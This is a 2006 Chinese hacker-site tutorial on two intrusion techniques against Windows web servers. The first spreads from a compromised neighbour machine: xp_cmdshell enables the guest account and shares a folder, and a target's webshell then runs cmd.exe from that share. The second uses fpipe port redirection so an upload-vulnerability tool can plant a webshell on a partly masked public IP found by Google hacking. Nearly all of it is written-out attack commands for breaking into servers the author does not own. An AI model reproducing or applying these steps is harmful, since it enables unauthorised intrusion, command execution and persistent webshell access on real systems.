 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 在WEBSHELL中巧妙利用文件共享来执行系统命令 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2006-3-13  |
|||||
|
最近在入侵Win2003时发现缺省情况下无法利用系统自带的cmd.exe文件来执行系统命令,上传cmd.exe文件时因为文件太大而失败,后来我通过一台相邻机器的文件共享成功上传了cmd.exe文件,具体过程如下: 我们已经获得了相邻机器(192.168.1.1)的管理员权限,利用SQL的xp_cmdshell命令执行以下的操作:  net user guest /active:yes 打开guest用户以允许文件共享的匿名访问  net share web=d:\web 将本机的WEB目录共享 然后在目标机上的WEBSHELL上如下进行输入:\\192.168.1.1\web\cmd.exe 最后将上图中的SHELL路径改为c:\cmd.exe即可正常运行系统命令。 由于cmd.exe可以通过打包上传到服务器,我建议哪位高手写一个基于ASP的RAR解压软件来方便2003服务器下的上传cmd.exe程序。 用明小子的DOMAIN3.5上传程序时遇到问题的解决方法 最近测试一台WEB服务器,发现其WEB服务开在非标准端口30000上,利用google hack的方法找到了一个文件上传程序:http:// 202.98.177.X:30000/manage/upload.asp,打开明小子的旁注3.5的上传漏洞程序时发现这样一个问题,它的上传功能只能识别基于标准80端口的文件上传,但是我们不能眼看着到手的肉机飞了啊,于是我想到了利用端口转向程序fpipe.exe来解决这个问题,具体思路如下: 说明:A机:入侵者的机器 B机:目标机器 1、 利用Fpipe建立端口重定向,我们在A机上运行下列命令:c:\> fpipe -l 80 -s 90 -r 30000 202.98.177.X(B机的公网IP),(大意是通过本机的80端口将数据转向到B机的30000上面)。 2、 然后在A机上运行DOMAIN3.5,在文件上传部分输入http://127.0.0.1/manage/upload.asp,成功上传了WEBSHELL。 3、 另外希望明小子能加上WEB端口自义的功能,使这个软件更加的完美。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 通过建立安全模型保障Web数据 US CERT:谷歌eBay雅虎网站均 webshell下分离大文件资料 经典Webshell提权集合九招 四成Facebook用户轻易泄露身 FaceBook源代码泄漏 机器数量庞大 Google成WEB服 Web2.0带来营销领域深刻变化 安全专家:Web 2.0站点的coo Web安全性问题的层次关系 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
